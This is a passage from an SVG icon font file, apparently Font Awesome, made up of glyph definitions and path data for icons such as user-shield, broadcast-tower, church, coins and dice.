c-15 16.2998 -26.5 35.7998 -33.2002 57.3994c-1 3.2998 0.299805 6.7998 3.2998 8.5l25.7998 14.9004c-2.59961 14.0996 -2.59961 28.5 0 42.5996l-25.7998 14.9004c-2.90039 1.7002 -4.2998 5.2002 -3.2998 8.5c6.7002 21.5996 18.2002 41.2002 33.2002 57.3994
c2.2998 2.5 6.09961 3.10059 9 1.40039l25.7998 -14.9004c10.8994 9.30078 23.3994 16.5 36.8994 21.3008v29.7998c0 3.39941 2.40039 6.39941 5.7002 7.09961c21.2002 4.7998 43.9004 5 66.2002 0c3.2998 -0.700195 5.7002 -3.7002 5.7002 -7.09961v-29.7998
c13.5 -4.80078 26 -12 36.8994 -21.3008l25.8008 14.9004c3 1.7002 6.69922 1.09961 9 -1.40039c15 -16.1992 26.5 -35.7998 33.1992 -57.3994c1 -3.2998 -0.299805 -6.7998 -3.2998 -8.5l-25.7998 -14.9004c2.59961 -14.0996 2.59961 -28.5 0 -42.5996zM496 47.5
c26.7998 0 48.5 21.7998 48.5 48.5s-21.7998 48.5 -48.5 48.5s-48.5 -21.7998 -48.5 -48.5s21.7002 -48.5 48.5 -48.5zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM425.2 -34.5v-9.2002
c0 -4.09961 0.799805 -8 2 -11.7998c-7.7002 -5.2998 -17.1006 -8.5 -27.2002 -8.5h-352c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992
c3.90039 0 7.60059 -0.900391 11.4004 -1.2002c-1 -2.89941 -2.2998 -5.7998 -3.2002 -8.7002c-5.5 -17.6992 1.90039 -36.5 17.9004 -45.6992l7.89941 -4.60059c-0.0996094 -2.59961 -0.0996094 -5.2002 0 -7.7998l-7.89941 -4.59961
c-16 -9.30078 -23.4004 -28 -17.9004 -45.7002c7.90039 -25.7002 21.9004 -49.7998 40.2002 -69.6006c7.5 -8 18 -12.5996 28.9004 -12.5996c6.7998 0 13.5996 1.90039 19.5996 5.2998l7.90039 4.60059c2.19922 -1.30078 4.5 -2.7002 6.7998 -3.90039z" />
    <glyph glyph-name="user-edit" unicode="&#xf4ff;" horiz-adv-x="639" 
d="M224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM313.6 160c39.9004 0 75.4004 -17.7998 99.9004 -45.5l-77.2998 -77.2998l-7.90039 -7.90039l-1.2002 -11.0996l-6.7998 -60.9004
c-0.799805 -7.2998 0.200195 -14.5 2.60059 -21.2998h-274.9c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992zM358.9 14.7002l137.899 137.8l71.7002 -71.7002
l-137.9 -137.899l-60.8994 -6.80078c-10.1006 -1.19922 -18.7002 7.40039 -17.6006 17.6006zM633 179.1c9.2998 -9.39941 9.2998 -24.5 0 -33.8994l-41.7998 -41.7998l-71.7998 71.6992l4.09961 4.10059l37.7998 37.7998c9.2998 9.2998 24.5 9.2998 33.7998 0z" />
    <glyph glyph-name="user-friends" unicode="&#xf500;" horiz-adv-x="640" 
d="M192 192c-61.9004 0 -112 50.0996 -112 112s50.0996 112 112 112s112 -50.0996 112 -112s-50.0996 -112 -112 -112zM268.8 160c63.6006 0 115.2 -51.5996 115.2 -115.2v-28.7998c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v28.7998
c0 63.6006 51.5996 115.2 115.2 115.2h8.2998c20.9004 -10 43.9004 -16 68.5 -16s47.7002 6 68.5 16h8.2998zM480 192c-53 0 -96 43 -96 96s43 96 96 96s96 -43 96 -96s-43 -96 -96 -96zM528 160c61.9004 0 112 -50.0996 112 -112c0 -26.5 -21.5 -48 -48 -48h-176.6
c0.0996094 2.09961 0.599609 4.2002 0.599609 6.40039v38.3994c0 38.6006 -15.2998 73.5 -39.7002 99.7998c16.5 9.5 35.2998 15.4004 55.7002 15.4004h3.7998c13.9004 -4.7998 28.6006 -8 44.2002 -8s30.2998 3.2002 44.2002 8h3.7998z" />
    <glyph glyph-name="user-graduate" unicode="&#xf501;" horiz-adv-x="448" 
d="M319.4 127.4c71.5 -3.10059 128.6 -61.6006 128.6 -133.801v-9.59961c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v9.59961c0 72.2002 57.0996 130.7 128.6 133.801l95.4004 -95.4004zM13.5996 368.2c-18.0996 4.39941 -18.0996 27.2002 0 31.5996
l190.601 45.9004c13 3.09961 26.7002 3.09961 39.7002 0l190.399 -46c18.2002 -4.40039 18.2002 -27.1006 0 -31.5l-96.2998 -23.2002c8.7002 -17.2002 14 -36.4004 14 -57c0 -70.7002 -57.2998 -128 -128 -128s-128 57.2998 -128 128c0 20.5996 5.40039 39.7998 14 57
l-66 15.9004v-52.6006c7 -4.2002 12 -11.5 12 -20.2998c0 -8.40039 -4.59961 -15.4004 -11.0996 -19.7002l15.5996 -62.2998c1.7002 -6.90039 -2.09961 -14 -7.59961 -14h-41.8008c-5.5 0 -9.2998 7.09961 -7.59961 14l15.5996 62.2998
c-6.5 4.2998 -11.0996 11.2998 -11.0996 19.7002c0 8.7998 5 16.0996 12 20.2998v58.4004z" />
    <glyph glyph-name="user-lock" unicode="&#xf502;" horiz-adv-x="640" 
d="M320 128v-160c0 -11.7002 3.40039 -22.5 8.90039 -32h-280.9c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992c5 0 9.7002 -1 14.5 -1.5
c-5 -9.09961 -8.09961 -19.4004 -8.09961 -30.5zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM608 160c17.7002 0 32 -14.2998 32 -32v-160c0 -17.7002 -14.2998 -32 -32 -32h-224
c-17.7002 0 -32 14.2998 -32 32v160c0 17.7002 14.2998 32 32 32h32v48c0 44.2002 35.7998 80 80 80s80 -35.7998 80 -80v-48h32zM528 160v48c0 17.5996 -14.4004 32 -32 32s-32 -14.4004 -32 -32v-48h64z" />
    <glyph glyph-name="user-minus" unicode="&#xf503;" horiz-adv-x="640" 
d="M624 240c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-192c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h192zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128z
M313.6 160c74.2002 0 134.4 -60.2002 134.4 -134.4v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992z" />
    <glyph glyph-name="user-ninja" unicode="&#xf504;" horiz-adv-x="448" 
d="M325.4 158.8c68.5996 -6.09961 122.6 -63 122.6 -133.2v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v41.5996c0 70.2002 54 127.101 122.6 133.2l101.4 -101.399zM32 256c0 33.4004 17.0996 62.7998 43.0996 80
c-26 17.2002 -43.0996 46.5996 -43.0996 80c32 0 60.0996 -15.7998 77.5 -39.7998c20.9004 42.3994 64.0996 71.7998 114.5 71.7998c70.7002 0 128 -57.2998 128 -128s-57.2998 -128 -128 -128c-58.7998 0 -107.7 39.7998 -122.8 93.7002
c-17.4004 -18.2002 -41.9004 -29.7002 -69.2002 -29.7002zM176 352c-17.7002 0 -32 -14.2998 -32 -32h160c0 17.7002 -14.2998 32 -32 32h-96z" />
    <glyph glyph-name="user-shield" unicode="&#xf505;" horiz-adv-x="640" 
d="M622.3 176.9c10.7002 -4.2002 17.7002 -14 17.7002 -24.9004c0 -124.5 -81.5996 -193.9 -132.9 -213.9c-4.19922 -1.59961 -12.5996 -3.69922 -22.1992 0c-64.2002 25.1006 -132.9 102.301 -132.9 213.9c0 10.9004 7 20.7002 17.7002 24.9004l115.2 45
c9.59961 3.69922 18.0996 1.59961 22.1992 0zM496 -14.4004c34.5996 16.4004 89.9004 64.7002 95.5 151.801l-95.5 37.2998v-189.101zM224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM320 152
c0 -95.2998 45.2002 -169.1 99.2002 -212c-5.90039 -2.5 -12.4004 -4 -19.2002 -4h-352c-26.5 0 -48 21.5 -48 48v41.5996c0 74.2002 60.2002 134.4 134.4 134.4h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16s50.7002 5.7998 72.9004 16h16.6992
c2.60059 0 5 -0.700195 7.5 -0.799805c-0.299805 -2.40039 -1.09961 -4.7002 -1.09961 -7.2002z" />
    <glyph glyph-name="user-slash" unicode="&#xf506;" horiz-adv-x="640" 
d="M633.8 -10.0996c7 -5.40039 8.2998 -15.5 2.90039 -22.3008l-19.6006 -25.2998c-5.5 -7 -15.5 -8.2002 -22.5 -2.7998l-588.399 454.7c-7 5.39941 -8.2002 15.3994 -2.7998 22.3994l19.5996 25.2002c5.5 7 15.5 8.2002 22.5 2.7998l147.6 -114
c5.40039 65.6006 59.8008 117.4 126.9 117.4c70.7002 0 128 -57.2998 128 -128c0 -55.7998 -35.9004 -102.7 -85.7002 -120.3zM96 25.5996c0 66.4004 48.2002 121.101 111.4 132.101l286.8 -221.7h-350.2c-26.5 0 -48 21.5 -48 48v41.5996z" />
    <glyph glyph-name="user-tag" unicode="&#xf507;" horiz-adv-x="639" 
d="M630.6 83.0996c12.5 -12.5 12.5 -32.6992 -0.0996094 -45.1992l-92.5 -92.5c-12.5 -12.5 -32.7998 -12.5 -45.2998 0l-90.2998 90.1992c-12 12 -18.7002 28.2002 -18.7002 45.2002v79.2002c0 17.7002 14.2998 32 32 32h79.2998c17 0 33.2998 -6.7002 45.2998 -18.7002z
M447.8 104.1c13.2998 0 24 10.8008 24 24c0 13.3008 -10.7002 24 -24 24s-24 -10.6992 -24 -24c0 -13.2998 10.7002 -24 24 -24zM224 192.1c-70.7002 0 -128 57.3008 -128 127.9c0 70.7002 57.2998 128 128 128s128 -57.2998 128 -127.9c0 -70.6992 -57.2998 -128 -128 -128
zM351.8 80.9004c0 -25.7002 10 -49.8008 28.1006 -67.9004l58 -58c-8.80078 -11.4004 -22.4004 -18.9004 -37.9004 -18.9004h-352c-26.5 0 -48 21.5 -48 48v41.6006c0 74.2002 60.2002 134.399 134.4 134.5h16.6992c22.3008 -10.2002 46.9004 -16 72.9004 -16
s50.7002 5.7998 72.9004 16h16.6992c13.3008 0 26 -2.60059 38.2002 -6.2002v-73.0996z" />
    <glyph glyph-name="user-tie" unicode="&#xf508;" horiz-adv-x="448" 
d="M224 192c-70.7002 0 -128 57.2998 -128 128s57.2998 128 128 128s128 -57.2998 128 -128s-57.2998 -128 -128 -128zM319.8 159.4c71.2998 -3.40039 128.2 -61.7002 128.2 -133.801v-41.5996c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v41.5996
c0 72.1006 56.9004 130.4 128.2 133.801l47.7998 -191.4l32 136l-32 56h96l-32 -56l32 -136z" />
    <glyph glyph-name="users-cog" unicode="&#xf509;" horiz-adv-x="639" 
d="M610.5 106.7l25.7998 -14.9004c2.90039 -1.7002 4.2998 -5.2002 3.2998 -8.5c-6.69922 -21.5996 -18.1992 -41.2002 -33.1992 -57.3994c-2.30078 -2.5 -6.10059 -3.10059 -9 -1.40039l-25.8008 14.9004c-10.8994 -9.30078 -23.3994 -16.5 -36.8994 -21.3008v-29.7998
c0 -3.39941 -2.40039 -6.39941 -5.7002 -7.09961c-21.2002 -4.7998 -43.9004 -5 -66.2002 0c-3.2998 0.700195 -5.7002 3.7002 -5.7002 7.09961v29.7998c-13.5 4.80078 -26 12 -36.8994 21.3008l-25.7998 -14.9004c-3 -1.7002 -6.7002 -1.09961 -9 1.40039
c-15 16.2998 -26.5 35.7998 -33.2002 57.3994c-1 3.2998 0.299805 6.7998 3.2998 8.5l25.7998 14.9004c-2.59961 14.0996 -2.59961 28.5 0 42.5996l-25.7998 14.9004c-2.90039 1.7002 -4.2998 5.2002 -3.2998 8.5c6.7002 21.5996 18.2002 41.2002 33.2002 57.3994
c2.2998 2.5 6.09961 3.10059 9 1.40039l25.7998 -14.9004c10.8994 9.30078 23.3994 16.5 36.8994 21.3008v29.7998c0 3.39941 2.40039 6.39941 5.7002 7.09961c21.2002 4.7998 43.9004 5 66.2002 0c3.2998 -0.700195 5.7002 -3.7002 5.7002 -7.09961v-29.7998
c13.5 -4.80078 26 -12 36.8994 -21.3008l25.8008 14.9004c3 1.7002 6.69922 1.09961 9 -1.40039c15 -16.1992 26.5 -35.7998 33.1992 -57.3994c1 -3.2998 -0.299805 -6.7998 -3.2998 -8.5l-25.7998 -14.9004c2.59961 -14.0996 2.59961 -28.5 0 -42.5996zM496 79.5
c26.7998 0 48.5 21.7998 48.5 48.5s-21.7998 48.5 -48.5 48.5s-48.5 -21.7998 -48.5 -48.5s21.7002 -48.5 48.5 -48.5zM96 224c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM320 192c-61.9004 0 -112 50.0996 -112 112
s50 111.9 111.9 111.9c61.8994 0 112 -50.1006 112 -112c0 -17.2002 -4.2002 -33.4004 -11.2002 -48c-0.799805 -0.5 -1.60059 -0.900391 -2.40039 -1.40039l-7.89941 4.59961c-5.90039 3.5 -12.7002 5.30078 -19.6006 5.30078c-11 0 -21.5 -4.60059 -28.8994 -12.6006
c-15.8008 -17.0996 -28 -37.5 -36.3008 -59.2002c-1.89941 -0.0996094 -3.69922 -0.599609 -5.59961 -0.599609zM425.2 -2.5v-9.2002c0 -7.5 2.5 -14.2998 6.2002 -20.2998h-255.4c-26.5 0 -48 21.5 -48 48v28.7998c0 63.6006 51.5996 115.2 115.3 115.2h8.2998
c20.9004 -10 43.9004 -16 68.5 -16c3.30078 0 6.5 0.400391 9.80078 0.599609c2.7998 -3.09961 6 -5.89941 9.7998 -8.09961l7.89941 -4.59961c-0.0996094 -2.60059 -0.0996094 -5.2002 0 -7.80078c-0.899414 -0.599609 -36.5 -15.7998 -25.7998 -50.2998
c7.90039 -25.7002 21.9004 -49.7998 40.2002 -69.5996c7.5 -8 18 -12.6006 28.9004 -12.6006c12.1992 0 19.2998 5 27.5 9.80078c2.19922 -1.30078 4.5 -2.7002 6.7998 -3.90039zM173.1 173.4c-40.2998 -22.1006 -68.8994 -62 -75.1992 -109.4h-65.9004
c-17.7002 0 -32 14.2998 -32 32v32c0 35.2998 28.7002 64 64 64h64c17.5996 0 33.5 -7.09961 45.0996 -18.5996z" />
    <glyph glyph-name="blender" unicode="&#xf517;" 
d="M416 64c35.3496 0 64 -28.6504 64 -64v-32c0 -17.6699 -14.3301 -32 -32 -32h-320c-17.6699 0 -32 14.3301 -32 32v32c0 35.3496 28.6504 64 64 64h256zM288 -32c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM328 384
c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h157.82l-17.46 -64h-140.36c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h131.64l-17.46 -64h-114.18c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h105.46l-17.46 -64
h-256l-8.73047 96h-103.27c-26.5098 0 -48 21.4902 -48 48v160c0 26.5098 21.4902 48 48 48h464l-17.46 -64h-166.54zM64 256h81.46l-11.6396 128h-69.8203v-128z" />
    <glyph glyph-name="book-open" unicode="&#xf518;" horiz-adv-x="575" 
d="M542.22 415.95c18.4199 1.04004 33.7803 -12.9902 33.7705 -30.7002v-337.84c0 -16.2305 -13.1299 -29.7705 -30.0205 -30.6602c-49.4697 -2.59961 -149.52 -12.0996 -218.7 -46.9199c-10.6494 -5.36035 -23.2793 1.93945 -23.2793 13.4902v363.87
c0 5.2793 2.62988 10.3291 7.26953 13.1699c67.2402 41.1592 176.16 52.4795 230.96 55.5898zM264.73 360.36c4.64941 -2.85059 7.26953 -7.7002 7.26953 -12.9902v-364.12c0 -11.5195 -12.5898 -18.8096 -23.21 -13.46c-69.1797 34.8398 -169.28 44.3496 -218.771 46.9502
c-16.8896 0.879883 -30.0195 14.4199 -30.0195 30.6602v337.85c0 17.71 15.3604 31.7402 33.7803 30.7002c54.7998 -3.12012 163.72 -14.4307 230.95 -55.5898z" />
    <glyph glyph-name="broadcast-tower" unicode="&#xf519;" horiz-adv-x="640" 
d="M150.94 256c-7.01074 0 -13.46 4.5 -15.4004 11.2402c-4.90039 16.9697 -7.54004 34.6396 -7.54004 52.7598s2.63965 35.79 7.53027 52.7695c1.9502 6.74023 8.39941 11.2305 15.4102 11.2305h33.7295c11.0098 0 18.6201 -10.8301 14.8604 -21.1797
c-4.93066 -13.5801 -7.5498 -27.9805 -7.5498 -42.8203s2.61914 -29.2402 7.5498 -42.8203c3.75 -10.3496 -3.85059 -21.1797 -14.8604 -21.1797h-33.7295zM89.9199 424.66c-16.54 -31.1406 -49.6104 -115.97 0.169922 -209.29
c5.66016 -10.6299 -1.92969 -23.3701 -13.9502 -23.3701h-34.8398c-6.18945 0 -11.9902 3.50977 -14.6094 9.13965c-23.5703 50.5303 -26.6904 94.1104 -26.6904 118.86c0 42.3496 9.40039 82.46 25.8896 118.69c2.60059 5.71973 8.4707 9.30957 14.7402 9.30957h35.3301
c12.0098 0 19.5996 -12.7197 13.96 -23.3398zM614.06 438.71c16.5205 -36.2295 25.9404 -76.3496 25.9404 -118.71s-9.42969 -82.4805 -25.96 -118.71c-2.59961 -5.70996 -8.45996 -9.29004 -14.7305 -9.29004h-35.2295c-12.1104 0 -19.6299 12.8398 -13.9102 23.5195
c48.1396 89.8105 17.9902 174.94 -0.280273 209.23c-5.63965 10.5898 2.04004 23.25 14.0205 23.25h35.4199c6.26953 0 12.1299 -3.58008 14.7295 -9.29004zM489.06 384c7.01074 0 13.46 -4.49023 15.4004 -11.2402c4.90039 -16.9697 7.54004 -34.6396 7.54004 -52.7598
s-2.62988 -35.79 -7.53027 -52.7598c-1.9502 -6.75 -8.38965 -11.2402 -15.4102 -11.2402h-33.7295c-11.0098 0 -18.6201 10.8301 -14.8604 21.1797c4.93066 13.5801 7.5498 27.9805 7.5498 42.8203s-2.61914 29.2402 -7.5498 42.8203
c-3.75 10.3496 3.85059 21.1797 14.8604 21.1797h33.7295zM372.76 283.88l130.5 -313.41c3.39062 -8.14941 -0.459961 -17.5195 -8.60938 -20.9199l-29.5107 -12.3096c-8.14941 -3.40039 -17.5098 0.450195 -20.9092 8.60938l-49.2002 118.15h-150.07l-49.1904 -118.15
c-3.38965 -8.14941 -12.7598 -12.0098 -20.9092 -8.60938l-29.5107 12.3096c-8.14941 3.40039 -12.0098 12.7705 -8.60938 20.9199l130.5 313.41c-7.0498 10.29 -11.2002 22.71 -11.2002 36.1201c0 35.3496 28.6396 64 63.96 64c35.3301 0 63.96 -28.6504 63.96 -64
c0 -13.4102 -4.15039 -25.8301 -11.2002 -36.1201zM271.62 128h96.7598l-48.3799 116.19z" />
    <glyph glyph-name="broom" unicode="&#xf51a;" horiz-adv-x="640" 
d="M256.47 231.23l86.7305 -109.181s-16.6006 -102.359 -76.5703 -150.12c-59.9697 -47.7793 -266.63 -34.1201 -266.63 -34.1201s3.7998 23.1406 11 55.4307l94.6201 112.17c3.96973 4.7002 -0.870117 11.6201 -6.65039 9.5l-60.3994 -22.0898
c14.4395 41.6602 32.7197 80.04 54.5996 97.4697c59.9697 47.7598 163.3 40.9404 163.3 40.9404zM636.53 416.97c5.48926 -6.91016 4.33984 -16.96 -2.5498 -22.4395l-232.48 -177.8l34.0898 -42.9209c5.08008 -6.39941 1.66016 -15.9092 -6.33984 -17.5996
l-58.7998 -12.4502l-86.7305 109.181l25.3301 54.5498c3.4502 7.41992 13.5 8.62012 18.5898 2.20996l34.1406 -42.9697l232.479 177.8c6.89062 5.48926 16.9199 4.33984 22.4102 -2.56055z" />
    <glyph glyph-name="chalkboard" unicode="&#xf51b;" horiz-adv-x="640" 
d="M96 384v-352h-64v376c0 22.0596 17.9404 40 40 40h496c22.0596 0 40 -17.9404 40 -40v-376h-64v352h-448zM624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-608c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h272v64h192v-64
h144z" />
    <glyph glyph-name="chalkboard-teacher" unicode="&#xf51c;" horiz-adv-x="640" 
d="M208 96c62.0596 0 112.33 -50.4805 112 -112.62c-0.139648 -26.2598 -21.7305 -47.3799 -48 -47.3799h-224c-26.2695 0 -47.8604 21.1201 -48 47.3799c-0.330078 62.1396 49.9404 112.62 112 112.62c2.38965 0 4.76953 -0.349609 7.0498 -1.08984
c12.9697 -4.20996 26.6006 -6.91016 40.9502 -6.91016s27.9805 2.7002 40.9404 6.91016c2.2793 0.740234 4.66992 1.08984 7.05957 1.08984zM160 128c-53.0195 0 -96 42.9805 -96 96s42.9805 96 96 96s96 -42.9805 96 -96s-42.9805 -96 -96 -96zM592 448
c26.4697 0 48 -22.25 48 -49.5898v-316.82c0 -27.3398 -21.5303 -49.5898 -48 -49.5898h-244.55c-6.57031 25.2695 -20.5898 47.3096 -39.6904 64h76.2402v64h128v-64h64v288h-352v-49.7998c-18.9004 11.0195 -40.5801 17.7998 -64 17.7998v46.4102
c0 27.3398 21.5303 49.5898 48 49.5898h384z" />
    <glyph glyph-name="church" unicode="&#xf51d;" horiz-adv-x="640" 
d="M464.46 201.32c9.63965 -5.78027 15.54 -16.2002 15.54 -27.4404v-237.88h-96v96c0 35.3496 -28.6504 64 -64 64s-64 -28.6504 -64 -64v-96h-96v237.88c0 10.0029 6.96191 22.2959 15.54 27.4404l112.46 67.4795v51.2002h-48c-8.83984 0 -16 7.16016 -16 16v32
c0 8.83984 7.16016 16 16 16h48v48c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-48h48c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-48v-51.2002zM0 52.04c0.00195312 11.6455 8.68945 24.8252 19.3896 29.4199l108.61 46.54
v-192h-112c-8.83984 0 -16 7.16016 -16 16v100.04zM620.61 81.46c11.7598 -5.0498 19.3896 -16.6201 19.3896 -29.4199v-100.04c0 -8.83984 -7.16016 -16 -16 -16h-112v192z" />
    <glyph glyph-name="coins" unicode="&#xf51e;" 
d="M0 42.7002c41.2998 -29.1006 116.8 -42.7002 192 -42.7002s150.7 13.5996 192 42.7002v-42.7002c0 -35.2998 -86 -64 -192 -64s-192 28.7002 -192 64v42.7002zM320 320c-106 0 -192 28.7002 -192 64s86 64 192 64s192 -28.7002 192 -64s-86 -64 -192 -64zM0 147.6
c41.2998 -34 116.9 -51.5996 192 -51.5996s150.7 17.5996 192 51.5996v-51.5996c0 -35.2998 -86 -64 -192 -64s-192 28.7002 -192 64v51.5996zM416 136.6v63.6006c38.7002 6.89941 72.7998 18.0996 96 34.5v-42.7002c0 -23.7002 -38.7002 -44.2998 -96 -55.4004zM192 288
c106 0 192 -35.7998 192 -80s-86 -80 -192 -80s-192 35.7998 -192 80s86 80 192 80zM411.3 231.7c-8.7998 23.7002 -30.5 42.8994 -60 57.2002c64.2002 3.19922 125.2 16.6992 160.7 41.7998v-42.7002c0 -24.2998 -40.7002 -45.5 -100.7 -56.2998z" />
    <glyph glyph-name="compact-disc" unicode="&#xf51f;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM88 192c0 88.2002 71.7998 160 160 160v32c-105.9 0 -192 -86.0996 -192 -192h32zM248 96c53 0 96 43 96 96s-43 96 -96 96s-96 -43 -96 -96s43 -96 96 -96zM248 224
c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32s-32 14.2998 -32 32s14.2998 32 32 32z" />
    <glyph glyph-name="crow" unicode="&#xf520;" horiz-adv-x="640" 
d="M544 416c53.0195 0 96 -28.6504 96 -64l-96 -16v-80c0 -87.2598 -58.2598 -160.8 -137.97 -184.14l41.2393 -111.53c2.27051 -6.23047 -0.939453 -13.1104 -7.16992 -15.3799l-22.5498 -8.20996c-6.22949 -2.27051 -13.1094 0.939453 -15.3799 7.16992l-44.5098 120.38
c-1.90039 -0.0595703 -3.75 -0.290039 -5.66016 -0.290039h-39.0596l38.3291 -103.68c2.27051 -6.23047 -0.939453 -13.1104 -7.16992 -15.3799l-22.5498 -8.20996c-6.22949 -2.27051 -13.1094 0.939453 -15.3799 7.16992l-44.4102 120.1h-96.4902l-121.539 -60.7695
c-20.0908 -10.04 -43.7305 4.56934 -43.7305 27.0293c0.00195312 8.33984 5.41797 19.168 12.0898 24.1699l371.91 292.59v20.9805c0 44.1797 35.8203 80 80 80c26.0898 0 49.04 -12.6797 63.6396 -32h16.3604zM464 344c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24
s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z" />
    <glyph glyph-name="crown" unicode="&#xf521;" horiz-adv-x="640" 
d="M528 0c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-416c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h416zM592 320c26.5 0 48 -21.5 48 -48s-21.5 -48 -48 -48c-2.59961 0 -5.2002 0.400391 -7.7002 0.799805l-72.2998 -192.8h-384
l-72.2998 192.8c-2.5 -0.399414 -5.10059 -0.799805 -7.7002 -0.799805c-26.5 0 -48 21.5 -48 48s21.5996 48 48.0996 48s48 -21.5 48 -48c0 -7.09961 -1.69922 -13.7998 -4.39941 -19.7998l72.2998 -43.4004c15.2998 -9.2002 35.2998 -4 44.2002 11.6006l81.5 142.6
c-10.7002 8.7998 -17.7002 22 -17.7002 37c0 26.5 21.5 48 48 48s48 -21.5 48 -48c0 -15 -7 -28.2002 -17.7002 -37l81.5 -142.6c8.90039 -15.6006 28.7998 -20.8008 44.2002 -11.6006l72.4004 43.4004c-2.80078 6.09961 -4.40039 12.7002 -4.40039 19.7998
c0 26.5 21.5 48 48 48z" />
    <glyph glyph-name="dice" unicode="&#xf522;" horiz-adv-x="640" 
d="M592 256c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-224c-26.5098 0 -48 21.4902 -48 48v46.4199l136.26 136.26c24.1201 24.1201 29.6904 59.7305 17 89.3203h118.74zM480 72c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24
s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24zM433.63 258.7c19.1602 -19.1602 19.1602 -50.2305 0 -69.4004l-174.939 -174.93c-19.1602 -19.1602 -50.2305 -19.1602 -69.3906 0l-174.93 174.939c-19.1602 19.1602 -19.1602 50.2305 0 69.3906l174.939 174.93
c19.1602 19.1602 50.2305 19.1602 69.3906 0zM96 200c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24zM224 72c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z
M224 200c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24zM224 328c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24zM352 200c13.25 0 24 10.75 24 24
c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24z" />
    <glyph glyph-name="dice-five" unicode="&#xf523;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM128 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM128 256
c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM224 160c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="dice-four" unicode="&#xf524;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM128 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM128 256
